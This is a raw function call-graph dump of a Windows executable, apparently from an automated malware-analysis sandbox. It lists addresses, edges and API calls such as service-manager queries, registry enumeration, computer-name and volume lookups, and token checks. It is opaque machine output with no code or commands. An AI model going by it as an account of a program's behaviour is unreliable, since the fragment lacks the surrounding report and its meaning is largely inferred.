50157 1107d4e4 _strtok 50156->50157 50158 1107d4df 50156->50158 50160 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50157->50160 50410 1107d060 IsDBCSLeadByte 50158->50410 50161 1107d4fa 50160->50161 50161->50088 50411 111097a0 GetSystemDirectoryA __wsplitpath 50162->50411 50164 1110985e 50165 11109905 50164->50165 50168 111098d9 GetComputerNameA 50164->50168 50166 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50165->50166 50167 1105ebb6 50166->50167 50203 110093d0 6 API calls std::locale::facet::_Facet_Register 50167->50203 50168->50165 50169 111098f2 50168->50169 50169->50165 50170->50047 50416 110c9720 50171->50416 50174 110c9949 _free 50174->50117 50175 110c9932 50420 11027f50 6 API calls 50175->50420 50178->50069 50179->50052 50427 11107a40 50180->50427 50182 1113bd3f 50182->50088 50184 1105d866 RegOpenKeyExA 50183->50184 50185 1105d888 50184->50185 50192 1105d860 50184->50192 50433 1105d260 11 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 50185->50433 50187 1105d9e5 50190 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50187->50190 50188 1105d89b RegEnumKeyExA 50191 1105d999 RegCloseKey 50188->50191 50196 1105d8d9 50188->50196 50189 11059e50 6 API calls 50189->50192 50193 1105d9f2 50190->50193 50191->50192 50192->50184 50192->50187 50192->50189 50193->50063 50194 1107d280 15 API calls 50194->50196 50195 1105d95d RegEnumKeyExA 50195->50196 50196->50191 50196->50194 50196->50195 50434 1105d260 11 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 50196->50434 50198->50108 50199->50122 50200->50119 50201->50123 50202->50117 50203->50103 50204->50111 50205->50039 50209 111591fb 50206->50209 50208 111592c9 50208->50137 50211 11159207 50209->50211 50210 1115921a 50233 111636c4 11 API calls _strcpy_s 50210->50233 50211->50210 50212 11159247 __getstream 50211->50212 50214 11159260 50212->50214 50216 1115922a __fsopen 50212->50216 50214->50216 50217 111669e1 50214->50217 50216->50208 50218 11166a03 50217->50218 50219 11166a17 50218->50219 50227 11166a2e 50218->50227 50237 111636c4 11 API calls _strcpy_s 50219->50237 50220 11166c31 50234 1116eaee 50220->50234 50223 11166c1f 50238 111636c4 11 API calls _strcpy_s 50223->50238 50224 11166a27 50224->50216 50225 11166b8d __fassign 50225->50223 50228 11166ba1 50225->50228 50227->50223 50227->50225 50231 11166bcb 50227->50231 50228->50223 50228->50228 50229 11166bb7 __fassign 50228->50229 50230 11166bd6 __fassign 50229->50230 50229->50231 50230->50231 50232 11166bf5 __fassign 50230->50232 50231->50220 50231->50223 50232->50223 50232->50231 50233->50216 50239 1116ea2a 50234->50239 50236 1116eb09 50236->50224 50237->50224 50238->50224 50241 1116ea36 50239->50241 50240 1116ea49 50313 111636c4 11 API calls _strcpy_s 50240->50313 50241->50240 50242 1116ea7f 50241->50242 50246 1116e2f6 50242->50246 50245 1116ea58 50245->50236 50247 1116e31d 50246->50247 50314 111718f5 50247->50314 50250 1116ea29 50252 1116ea49 50250->50252 50255 1116ea7f 50250->50255 50251 1116e339 50253 1116e3d3 50251->50253 50254 1116e378 50251->50254 50272 1116e5a2 50251->50272 50369 111636c4 11 API calls _strcpy_s 50252->50369 50259 1116e42d __alloc_osfhnd 50253->50259 50260 1116e45a 50253->50260 50322 111636c4 11 API calls _strcpy_s 50254->50322 50258 1116e2f6 __tsopen_nolock 68 API calls 50255->50258 50261 1116ea58 50258->50261 50264 1116e515 CreateFileA 50259->50264 50267 1116e391 50259->50267 50323 111636c4 11 API calls _strcpy_s 50260->50323 50261->50245 50265 1116e5b2 GetFileType 50264->50265 50266 1116e542 50264->50266 50269 1116e603 50265->50269 50270 1116e5bf GetLastError __dosmaperr CloseHandle 50265->50270 50268 1116e57b GetLastError __dosmaperr 50266->50268 50271 1116e556 CreateFileA 50266->50271 50267->50245 50268->50272 50324 1116be72 SetStdHandle 50269->50324 50270->50272 50273 1116e5f6 50270->50273 50271->50265 50271->50268 50319 11163672 50272->50319 50273->50272 50275 1116e621 50276 1116e677 50275->50276 50278 1116e837 50275->50278 50279 1116e6e6 50275->50279 50325 11169ed0 14 API calls __chsize_nolock 50276->50325 50278->50272 50280 1116e99f CloseHandle CreateFileA 50278->50280 50279->50278 50286 1116e840 50279->50286 50292 1116e790 50279->50292 50280->50273 50281 1116e9cc GetLastError __dosmaperr 50280->50281 50368 1116bef3 SetStdHandle 50281->50368 50282 1116e681 50295 1116e68a 50282->50295 50326 11169823 50282->50326 50285 1116e6b4 50289 1116e6cd 50285->50289 50363 11171684 40 API calls 3 library calls 50285->50363 50286->50278 50293 1116e85d __lseeki64_nolock 50286->50293 50299 1116e7b4 50286->50299 50287 1116e808 50291 11169823 __read_nolock 30 API calls 50287->50291 50288 1116e697 __close_nolock 50288->50272 50289->50288 50364 11169ed0 14 API calls __chsize_nolock 50289->50364 50305 1116e815 50291->50305 50292->50278 50292->50287 50297 1116e7df __lseeki64_nolock 50292->50297 50292->50299 50296 1116e873 __lseeki64_nolock 50293->50296 50293->50299 50295->50279 50295->50288 50298 1116e882 50296->50298 50297->50299 50302 1116e7f1 __lseeki64_nolock 50297->50302 50298->50278 50300 1116e88a 50298->50300 50299->50278 50299->50288 50367 1116782e 34 API calls 4 library calls 50299->50367 50300->50288 50302->50287 50302->50288 50303 1116e89e __close_nolock 50303->50272 50304 1116e8b8 50306 1116e8da 50304->50306 50308 1116e8bf 50304->50308 50305->50278 50305->50288 50305->50303 50305->50304 50305->50306 50366 11169ed0 14 API calls __chsize_nolock 50306->50366 50365 11169ed0 14 API calls __chsize_nolock 50308->50365 50309 1116e8e3 50309->50298 50311 1116e8c9 50311->50288 50312 1116e8d4 50311->50312 50312->50278 50313->50245 50315 11171916 50314->50315 50316 11171901 50314->50316 50315->50251 50317 111636c4 _strcpy_s 11 API calls 50316->50317 50318 11171911 50317->50318 50318->50251 50320 11163549 __call_reportfault 8 API calls 50319->50320 50321 11163684 GetCurrentProcess TerminateProcess 50320->50321 50321->50250 50322->50267 50323->50267 50324->50275 50325->50282 50327 1116985a 50326->50327 50329 1116983f 50326->50329 50330 11169869 50327->50330 50332 11169888 50327->50332 50328 111698a6 50335 111636c4 _strcpy_s 11 API calls 50328->50335 50329->50285 50331 111636c4 _strcpy_s 11 API calls 50330->50331 50331->50329 50332->50328 50332->50329 50333 111698ef 50332->50333 50334 11169929 50332->50334 50333->50328 50341 111698fa ReadFile 50333->50341 50336 1115f539 __malloc_crt 16 API calls 50334->50336 50335->50329 50338 1116993f 50336->50338 50338->50329 50342 11169967 __lseeki64_nolock 50338->50342 50339 11169a25 50340 11169d9d GetLastError 50339->50340 50344 11169a39 50339->50344 50343 11169dc1 50340->50343 50357 11169ba4 50340->50357 50341->50339 50341->50340 50342->50341 50345 11169c24 __dosmaperr 50343->50345 50343->50357 50347 11169c69 50344->50347 50349 11169a55 50344->50349 50344->50357 50345->50357 50346 11169c37 _free 50346->50329 50348 11169cde ReadFile 50347->50348 50347->50357 50351 11169d07 50348->50351 50352 11169cfd GetLastError 50348->50352 50350 11169ab9 ReadFile 50349->50350 50358 11169b36 50349->50358 50353 11169ad7 GetLastError 50350->50353 50354 11169ae1 50350->50354 50351->50347 50359 11169d4a __lseeki64_nolock 50351->50359 50352->50347 50352->50351 50353->50349 50353->50354 50354->50349 50360 11169b0f __lseeki64_nolock 50354->50360 50355 11169bfa MultiByteToWideChar 50356 11169c1e GetLastError 50355->50356 50355->50357 50356->50345 50357->50329 50357->50346 50358->50357 50361 11169b6e 50358->50361 50362 11169be8 __lseeki64_nolock 50358->50362 50359->50347 50360->50349 50361->50355 50362->50355 50363->50289 50364->50295 50365->50311 50366->50309 50367->50299 50368->50273 50369->50261 50371 11166fb2 50370->50371 50373 11166fc7 50370->50373 50394 111636c4 11 API calls _strcpy_s 50371->50394 50375 11166ffc 50373->50375 50377 11166fc2 50373->50377 50380 1116c70e 50373->50380 50383 11169dda 50375->50383 50377->50147 50378->50144 50379->50147 50395 1115f539 50380->50395 50385 11169de6 50383->50385 50384 11169e15 50408 111636c4 11 API calls _strcpy_s 50384->50408 50385->50384 50386 11169dee 50385->50386 50387 11169e71 50385->50387 50386->50377 50401 1116bfe2 50387->50401 50389 11169e77 50391 11169823 __read_nolock 30 API calls 50389->50391 50392 11169e91 50389->50392 50391->50392 50409 11169ec8 __unlock_fhandle 50392->50409 50394->50377 50397 1115f542 50395->50397 50396 111583b1 _malloc 15 API calls 50396->50397 50397->50396 50398 1115f578 50397->50398 50399 1115f559 Sleep 50397->50399 50398->50375 50400 1115f56e 50399->50400 50400->50397 50400->50398 50402 1116bfee 50401->50402 50403 1116c013 __lock 50402->50403 50406 1116c036 50402->50406 50405 1116c023 InitializeCriticalSectionAndSpinCount 50403->50405 50403->50406 50404 1116c04d EnterCriticalSection 50407 1116c06a 50404->50407 50405->50406 50406->50404 50406->50407 50407->50389 50408->50386 50409->50386 50410->50157 50412 111097f1 50411->50412 50412->50412 50413 111097f9 GetVolumeInformationA 50412->50413 50414 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50413->50414 50415 11109830 50414->50415 50415->50164 50417 110c974c 50416->50417 50418 110c9739 50416->50418 50417->50174 50417->50175 50418->50417 50421 110c95f0 50418->50421 50422 110c95fb 50421->50422 50423 110c9612 50421->50423 50426 11027f50 6 API calls 50422->50426 50423->50417 50428 11107a57 EnterCriticalSection 50427->50428 50429 11107a4e GetCurrentThreadId 50427->50429 50430 11107a6e 50428->50430 50429->50428 50431 11107a75 LeaveCriticalSection 50430->50431 50432 11107a88 LeaveCriticalSection 50430->50432 50431->50182 50432->50182 50433->50188 50434->50196 50436 1102b5f3 50435->50436 50438 1107d140 IsDBCSLeadByte 50436->50438 50444 1102b61a 50436->50444 50437 1113b570 21 API calls 50439 1102b6f4 50437->50439 50438->50444 50449 1102b704 50439->50449 50486 11025890 50439->50486 50441 1102b810 50443 1102b84a CloseHandle 50441->50443 50446 1102b865 50441->50446 50442 1105ddb0 169 API calls 50442->50449 50443->50446 50444->50437 50447 1105d820 25 API calls 50446->50447 50453 1102b894 50446->50453 50467 1102b8fe 50446->50467 50447->50453 50448 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50451 1102b93a 50448->50451 50449->50441 50449->50442 50450 1102b817 Sleep 50449->50450 50452 1102b78d OpenSCManagerA 50449->50452 50450->50449 50451->49455 50452->50449 50454 1102b7a0 50452->50454 50456 1113b0a0 122 API calls 50453->50456 50457 1102b7a2 OpenServiceA 50454->50457 50460 1102b8b3 50456->50460 50458 1102b7b6 QueryServiceStatus CloseServiceHandle 50457->50458 50459 1102b7e5 CloseServiceHandle 50457->50459 50458->50459 50461 1102b7d4 Sleep 50458->50461 50459->50449 50462 111395a0 8 API calls 50460->50462 50461->50457 50461->50459 50463 1102b8ca 50462->50463 50464 1102b8e8 50463->50464 50465 1105ee80 169 API calls 50463->50465 50491 11029350 50464->50491 50465->50464 50467->50448 50469 1102c724 50468->50469 50470 1113c594 LoadLibraryA 50468->50470 50469->49457 50469->49463 50470->50469 50471 1113c5a8 50470->50471 50557 1113b8f0 20 API calls 50471->50557 50473 1113c5ad 50473->50469 50475->49474 50477 1107d14c 50476->50477 50479 1107d151 __mbschr_l 50476->50479 50558 1107d060 IsDBCSLeadByte 50477->50558 50479->49471 50481->49497 50482->49501 50483->49503 50512 111598eb 50486->50512 50488 110258a0 50489 110258c8 50488->50489 50490 110258ad GetDriveTypeA 50488->50490 50489->50449 50490->50489 50492 1102938a 50491->50492 50518 110c9870 50492->50518 50494 1102939a 50495 110c9920 7 API calls 50494->50495 50500 110293c1 50495->50500 50496 11029453 50498 1102946f 50496->50498 50505 11029483 50496->50505 50537 11027f50 6 API calls 50498->50537 50500->50496 50502 1107d280 15 API calls 50500->50502 50530 1107d330 50500->50530 50501 11029547 50504 11029563 50501->50504 50511 11029577 50501->50511 50502->50500 50503 1107d330 15 API calls 50503->50505 50538 11027f50 6 API calls 50504->50538 50505->50501 50505->50503 50507 110c9920 7 API calls 50508 11029610 50507->50508 50509 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50508->50509 50510 11029627 50509->50510 50510->50467 50511->50507 50513 1115990d 50512->50513 50514 111598f9 50512->50514 50517 11159895 _LocaleUpdate::_LocaleUpdate __isctype_l 50513->50517 50514->50488 50516 11159917 50516->50488 50517->50516 50519 110c9889 __strdup 50518->50519 50520 110c9884 50518->50520 50521 110c98a0 50519->50521 50520->50519 50522 110c95f0 6 API calls 50521->50522 50523 110c98b3 50522->50523 50539 110c9010 50523->50539 50526 110c98dc 50526->50494 50527 110c98c5 50551 11027f50 6 API calls 50527->50551 50531 1107d342 50530->50531 50532 1107d33d 50530->50532 50536 1107d363 50531->50536 50556 11159e45 14 API calls 2 library calls 50531->50556 50555 1107d060 IsDBCSLeadByte 50532->50555 50535 1107d35c 50535->50500 50536->50500 50540 110c901d 50539->50540 50541 110c9038 50540->50541 50542 110c9021 50540->50542 50544 110c9035 50541->50544 50545 110c9056 50541->50545 50552 11027f50 6 API calls 50542->50552 50544->50541 50553 11027f50 6 API calls 50544->50553 50547 110c9053 50545->50547 50550 110c9079 50545->50550 50547->50545 50554 11027f50 6 API calls 50547->50554 50550->50526 50550->50527 50555->50531 50556->50535 50557->50473 50558->50479 50560 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50559->50560 50561 1113a818 50560->50561 50561->49516 50563 1113939a 50562->50563 50563->49552 50564->49556 50565->49556 50577->49615 50578->49624 50582 110715d6 50581->50582 50584 110715ed 50581->50584 50621 11027f50 6 API calls 50582->50621 50584->50584 50585 110715ea 50584->50585 50588 11071635 50584->50588 50585->50584 50622 11027f50 6 API calls 50585->50622 50595 1105f940 GetVersionExA 50588->50595 50596 1105f981 RegOpenKeyExA 50595->50596 50971->49906 50972->49910 50973->49930 50974->49917 50976->49938 50978 11027113 50977->50978 50979 1102775b 50977->50979 50980 110271d0 GetModuleFileNameA _strrchr 50978->50980 50989 11027148 50978->50989 50982 110277f7 50979->50982 50983 1102780a 50979->50983 50981 111592b7 92 API calls 50980->50981 50988 110271cb 50981->50988 50985 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50982->50985 50984 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50983->50984 50986 1102781b 50984->50986 50987 11027806 50985->50987 50986->49953 50987->49953 50988->50979 51004 110255e0 35 API calls 2 library calls 50988->51004 50989->50989 50991 111592b7 92 API calls 50989->50991 50991->50988 50993 11027244 51000 110276c5 50993->51000 51005 11025450 15 API calls 2 library calls 50993->51005 50995 11027280 51006 110255e0 35 API calls 2 library calls 50995->51006 50997 11027290 50997->51000 51007 110255e0 35 API calls 2 library calls 50997->51007 51000->51000 51010 11159081 16 API calls 2 library calls 51000->51010 51002 11159d1c 14 API calls _LanguageEnumProc@4 51003 110272b3 __mbschr_l 51002->51003 51003->51000 51003->51002 51008 11025450 15 API calls 2 library calls 51003->51008 51009 110255e0 35 API calls 2 library calls 51003->51009 51004->50993 51005->50995 51006->50997 51007->51003 51008->51003 51009->51003 51010->50979 51011 1113a570 51012 1113a581 51011->51012 51020 11139f90 51012->51020 51016 1113a5cb 51017 1113a5d2 ResetEvent 51016->51017 51018 1113a5e6 SetEvent WaitForMultipleObjects 51016->51018 51017->51016 51018->51017 51019 1113a604 51018->51019 51021 11139fbf 51020->51021 51022 11139f9c GetCurrentProcess 51020->51022 51024 111077a0 std::locale::facet::_Facet_Register 22 API calls 51021->51024 51027 11139fe9 WaitForMultipleObjects 51021->51027 51022->51021 51023 11139fad GetModuleFileNameA 51022->51023 51023->51021 51025 11139fdb 51024->51025 51025->51027 51028 111398e0 GetModuleFileNameA 51025->51028 51027->51016 51027->51019 51029 11139923 51028->51029 51031 11139963 51028->51031 51030 1107d210 2 API calls 51029->51030 51032 11139931 51030->51032 51033 11139989 GetModuleHandleA GetProcAddress 51031->51033 51034 1113996f LoadLibraryA 51031->51034 51032->51031 51037 11139938 LoadLibraryA 51032->51037 51035 111399b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 51033->51035 51036 111399a9 51033->51036 51034->51033 51038 1113997e LoadLibraryA 51034->51038 51039 111399e3 10 API calls 51035->51039 51036->51039 51037->51031 51038->51033 51040 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51039->51040 51041 11139a60 51040->51041 51041->51027 51042 1103f880 51043 1103f8a3 51042->51043 51044 1103f88a 51042->51044 51045 1103f8da 51043->51045 51047 1103f8b0 51043->51047 51046 1103f700 146 API calls 51045->51046 51048 1103f8c4 51046->51048 51047->51048 51050 1103f700 51047->51050 51051 1103f732 51050->51051 51052 1103f738 51051->51052 51059 1103f754 51051->51059 51053 110f3800 6 API calls 51052->51053 51055 1103f74a CloseHandle 51053->51055 51054 1103f868 51056 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51054->51056 51055->51059 51058 1103f875 51056->51058 51057 1103f7e8 51072 110f3800 GetTokenInformation 51057->51072 51058->51048 51059->51054 51062 1103f78d 51059->51062 51080 11083620 143 API calls 3 library calls 51059->51080 51062->51054 51062->51057 51063 1103f7fa 51064 1103f802 CloseHandle 51063->51064 51068 1103f809 51063->51068 51064->51068 51065 1103f84b 51066 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51065->51066 51070 1103f864 51066->51070 51067 1103f831 51069 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51067->51069 51068->51065 51068->51067 51071 1103f847 51069->51071 51070->51048 51071->51048 51073 110f3837 51072->51073 51076 110f3848 51072->51076 51074 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51073->51074 51075 110f3844 51074->51075 51075->51063 51076->51073 51077 110f3874 51076->51077 51078 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51077->51078 51079 110f389a 51078->51079 51079->51063 51080->51062 51081 1102ee87 51082 1102ee9a 51081->51082 51083 1102eebe RegOpenKeyExA 51082->51083 51090 1102ef73 51082->51090 51142 1102f4f5 51082->51142 51084 1102eee6 51083->51084 51083->51090 51088 11139370 RegQueryValueExA 51084->51088 51085 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51089 1102f666 51085->51089 51086 1102ef97 51092 111077a0 std::locale::facet::_Facet_Register 22 API calls 51086->51092 51102 1102efd5 GetStockObject GetObjectA 51086->51102 51087 1102f077 51091 111077a0 std::locale::facet::_Facet_Register 22 API calls 51087->51091 51100 1102ef0e 51088->51100 51090->51086 51094 1102efe9 GetModuleHandleA GetProcAddress 51090->51094 51106 1102f013 51090->51106 51093 1102f07e 51091->51093 51096 1102efb9 51092->51096 51093->51102 51244 110f31f0 25 API calls std::locale::facet::_Facet_Register 51093->51244 51097 1102f006 GetNativeSystemInfo 51094->51097 51094->51106 51095 1102ef66 RegCloseKey 51095->51090 51145 11101110 51096->51145 51097->51106 51100->51095 51242 11159a6a _LocaleUpdate::_LocaleUpdate __isctype_l __isdigit_l 51100->51242 51104 1102f207 SetErrorMode SetErrorMode 51102->51104 51108 111077a0 std::locale::facet::_Facet_Register 22 API calls 51104->51108 51106->51086 51106->51087 51107 1102ef2d 51110 1102ef46 51107->51110 51243 11159a6a _LocaleUpdate::_LocaleUpdate __isctype_l __isdigit_l 51107->51243 51111 1102f243 51108->51111 51110->51095 51112 111077a0 std::locale::facet::_Facet_Register 22 API calls 51111->51112 51113 1102f283 51112->51113 51114 1102f2a1 InterlockedExchange 51113->51114 51115 111077a0 std::locale::facet::_Facet_Register 22 API calls 51114->51115 51116 1102f2c5 51115->51116 51190 11085e20 51116->51190 51118 1102f2dd GetACP _sprintf 51201 1115ac63 51118->51201 51121 1102f30e 51122 111077a0 std::locale::facet::_Facet_Register 22 API calls 51121->51122 51123 1102f354 51122->51123 51124 1105d0a0 22 API calls 51123->51124 51125 1102f37f 51124->51125 51126 111077a0 std::locale::facet::_Facet_Register 22 API calls 51125->51126 51128 1102f3a6 51125->51128 51126->51128 51127 111077a0 std::locale::facet::_Facet_Register 22 API calls 51129 1102f3f4 51127->51129 51128->51127 51226 1111d1b0 51129->51226 51131 1102f416 51132 1102f447 51131->51132 51133 1102f4ce 51131->51133 51134 111077a0 std::locale::facet::_Facet_Register 22 API calls 51132->51134 51138 1102f4cc 51133->51138 51245 1111d2a0 35 API calls 51133->51245 51140 1102f44e 51134->51140 51137 1102f4e7 51137->51142 51238 1100d1e0 51137->51238 51233 1100d4c0 51138->51233 51141 111077a0 std::locale::facet::_Facet_Register 22 API calls 51140->51141 51143 1102f47d 51141->51143 51142->51085 51144 11025f00 16 API calls 51143->51144 51144->51138 51146 111077a0 std::locale::facet::_Facet_Register 22 API calls 51145->51146 51147 11101171 51146->51147 51148 11101182 51147->51148 51149 1110118d 51147->51149 51252 110ff670 28 API calls 3 library calls 51148->51252 51151 1110118f OpenEventA 51149->51151 51152 111012b1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 51151->51152 51153 111011f8 CloseHandle GetSystemDirectoryA 51151->51153 51156 111077a0 std::locale::facet::_Facet_Register 22 API calls 51152->51156 51155 11101218 51153->51155 51154 11101189 51154->51151 51155->51155 51157 11101220 LoadLibraryA 51155->51157 51158 11101303 51156->51158 51157->51152 51159 11101251 51157->51159 51160 1110131c 51158->51160 51253 110ed560 9 API calls std::locale::facet::_Facet_Register 51158->51253 51161 1113b380 21 API calls 51159->51161 51163 11107630 178 API calls 51160->51163 51164 1110125b 51161->51164 51165 11101338 CloseHandle 51163->51165 51166 11101262 GetProcAddress 51164->51166 51167 1110127a GetProcAddress 51164->51167 51246 110996c0 51165->51246 51166->51167 51169 111012a4 FreeLibrary 51167->51169 51170 11101296 51167->51170 51169->51152 51170->51152 51172 111013e5 51174 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51172->51174 51173 111077a0 std::locale::facet::_Facet_Register 22 API calls 51175 11101353 51173->51175 51176 111013ff 51174->51176 51177 11101364 51175->51177 51178 1110136d 51175->51178 51176->51102 51254 110ed560 9 API calls std::locale::facet::_Facet_Register 51177->51254 51180 11107630 178 API calls 51178->51180 51181 11101389 CloseHandle 51180->51181 51182 1113b380 21 API calls 51181->51182 51183 1110139a 51182->51183 51183->51172 51184 111077a0 std::locale::facet::_Facet_Register 22 API calls 51183->51184 51185 111013a8 51184->51185 51186 111013c2 51185->51186 51255 110ed560 9 API calls std::locale::facet::_Facet_Register 51185->51255 51188 11107630 178 API calls 51186->51188 51189 111013de CloseHandle 51188->51189 51189->51172 51191 111077a0 std::locale::facet::_Facet_Register 22 API calls 51190->51191 51192 11085e57 51191->51192 51194 111077a0 std::locale::facet::_Facet_Register 22 API calls 51192->51194 51197 11085e79 InitializeCriticalSection 51192->51197 51196 11085e72 51194->51196 51195 11085eda 51195->51118 51196->51197 51269 111579fa 15 API calls std::exception::_Copy_str 51196->51269 51197->51195 51199 11085ea9 51270 11157e51 RaiseException 51199->51270 51202 1115ac6f 51201->51202 51203 1115ac90 __getptd 51202->51203 51204 1115ac79 51202->51204 51271 11165c68 51203->51271 51305 111636c4 11 API calls _strcpy_s 51204->51305 51206 1115ac9f 51281 1115f57e 51206->51281 51210 1115acc4 __lock __copytlocinfo_nolock 51211 1115ace2 51210->51211 51287 1115aa47 51211->51287 51214 1115adac 51309 11165a37 8 API calls 51214->51309 51215 1115acfb 51216 1115ad1a __lock 51215->51216 51306 11165c1b 31 API calls 3 library calls 51216->51306 51218 1115adb2 51310 11165ad0 15 API calls 51218->51310 51221 1115ad33 51307 11165a37 8 API calls 51221->51307 51223 1115ad39 51225 1115ac89 51223->51225 51308 11165c1b 31 API calls 3 library calls 51223->51308 51225->51121 51227 111077a0 std::locale::facet::_Facet_Register 22 API calls 51226->51227 51228 1111d1e4 51227->51228 51229 1111d1fa 51228->51229 51232 1111d215 51228->51232 51359 11071ba0 191 API calls std::locale::facet::_Facet_Register 51229->51359 51231 1111d20a 51231->51232 51232->51131 51234 1100d4d2 51233->51234 51235 1100d4cb 51233->51235 51236 1100d4db FreeLibrary 51234->51236 51237 1100d51e 51234->51237 51235->51137 51236->51237 51237->51137 51239 1100d246 wsprintfA 51238->51239 51240 1100d1eb 51238->51240 51239->51142 51240->51239 51241 1100d1f2 51240->51241 51241->51142 51242->51107 51243->51107 51244->51102 51245->51138 51247 110996cf GetCurrentProcess OpenProcessToken 51246->51247 51248 1109970d 51246->51248 51247->51248 51249 110996f2 51247->51249 51248->51172 51248->51173 51256 110995f0 51249->51256 51251 110996fb CloseHandle 51251->51248 51252->51154 51253->51160 51254->51178 51255->51186 51257 11099610 GetTokenInformation 51256->51257 51262 110996a6 51256->51262 51259 11099632 __crtGetStringTypeA_stat 51257->51259 51258 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51260 110996b8 51258->51260 51261 11099638 GetTokenInformation 51259->51261 51259->51262 51260->51251 51261->51262 51263 1109964a 51261->51263 51262->51258 51264 1109967f EqualSid 51263->51264 51265 11099653 AllocateAndInitializeSid 51263->51265 51264->51262 51266 1109968d 51264->51266 51265->51262 51265->51264 51267 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51266->51267 51268 110996a2 51267->51268 51268->51251 51269->51199 51270->51197 51272 111647d0 51271->51272 51273 11165c74 __getptd 51272->51273 51274 11165ca7 __lock 51273->51274 51275 11165c85 51273->51275 51311 11165c1b 31 API calls 3 library calls 51274->51311 51275->51274 51277 11165c8b __getptd 51275->51277 51278 11165c93 ___pctype_func 51277->51278 51279 11165c97 __amsg_exit 51278->51279 51280 11165c9f 51278->51280 51279->51280 51280->51206 51284 1115f587 51281->51284 51283 1115acb5 51283->51210 51283->51225 51284->51283 51285 1115f5a5 Sleep 51284->51285 51312 11165926 51284->51312 51286 1115f5ba 51285->51286 51286->51283 51286->51284 51288 1115aa70 51287->51288 51294 1115aa8b 51287->51294 51290 1115aa7a 51288->51290 51292 1115a70d __setlocale_set_cat 32 API calls 51288->51292 51289 1115ac4f __setlocale_get_all 51289->51290 51293 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51290->51293 51291 1115abdc __expandlocale 51291->51290 51297 1115abf8 51291->51297 51292->51290 51295 1115ac61 51293->51295 51294->51289 51294->51291 51299 1115aac0 _strpbrk _strlen 51294->51299 51295->51214 51295->51215 51301 1115abb5 51297->51301 51316 1115a70d __getptd __expandlocale 51297->51316 51298 1115ab07 _strncmp 51298->51299 51299->51290 51299->51298 51300 1115ab38 _strcspn 51299->51300 51299->51301 51302 1115abce 51299->51302 51304 1115a70d __setlocale_set_cat 32 API calls 51299->51304 51300->51299 51301->51289 51301->51290 51303 11163672 __invoke_watson 10 API calls 51302->51303 51303->51290 51304->51299 51305->51225 51306->51221 51307->51223 51308->51225 51309->51218 51310->51225 51311->51278 51314 11165932 51312->51314 51313 1116593e 51313->51284 51314->51313 51315 11165960 RtlAllocateHeap 51314->51315 51315->51313 51315->51314 51317 1115a769 51316->51317 51319 1115a779 _strlen 51316->51319 51318 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51317->51318 51320 1115a777 51318->51320 51319->51317 51321 1115f539 __malloc_crt 16 API calls 51319->51321 51320->51297 51322 1115a7b3 _memmove 51321->51322 51322->51317 51353 1116165f 51322->51353 51324 1115aa1b 51325 11163672 __invoke_watson 10 API calls 51324->51325 51326 1115aa46 51325->51326 51327 1115aa70 51326->51327 51336 1115aa8b 51326->51336 51330 1115aa7a 51327->51330 51332 1115a70d __setlocale_set_cat 21 API calls 51327->51332 51328 1115a826 _memmove 51328->51324 51342 1115a96d 51328->51342 51357 1116962e 20 API calls __crtGetStringTypeA_stat 51328->51357 51329 1115ac4f __setlocale_get_all 51329->51330 51335 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51330->51335 51331 1115abdc __expandlocale 51331->51330 51345 1115abf8 51331->51345 51332->51330 51333 1115a9e1 51333->51324 51338 1115a9ed InterlockedDecrement 51333->51338 51334 1115a9b0 _free 51334->51317 51337 1115ac61 51335->51337 51336->51329 51336->51331 51347 1115aac0 _strpbrk _strlen 51336->51347 51337->51297 51338->51324 51340 1115aa05 _free _free 51338->51340 51340->51324 51341 1115a92a 51341->51342 51343 1115a946 _memcmp 51341->51343 51342->51333 51342->51334 51343->51342 51344 1115a70d __setlocale_set_cat 21 API calls 51344->51345 51345->51344 51349 1115abb5 51345->51349 51346 1115ab07 _strncmp 51346->51347 51347->51330 51347->51346 51348 1115ab38 _strcspn 51347->51348 51347->51349 51350 1115abce 51347->51350 51352 1115a70d __setlocale_set_cat 21 API calls 51347->51352 51348->51347 51349->51329 51349->51330 51351 11163672 __invoke_watson 10 API calls 51350->51351 51351->51330 51352->51347 51354 1116166d 51353->51354 51356 11161683 51354->51356 51358 111636c4 11 API calls _strcpy_s 51354->51358 51356->51328 51357->51341 51358->51356 51359->51231 51360 1106d800 51361 1106d921 51360->51361 51388 1106d845 51360->51388 51362 1106db47 51361->51362 51363 1106dbe2 51361->51363 51364 1106db63 51361->51364 51365 1106dc40 51361->51365 51366 1106dcce 51361->51366 51367 1106db2d 51361->51367 51368 1106dbca 51361->51368 51369 1106da48 51361->51369 51370 1106dcb2 51361->51370 51371 1106dcbe 51361->51371 51384 1106d93d 51361->51384 51392 1106d855 51361->51392 51404 1106b9d0 35 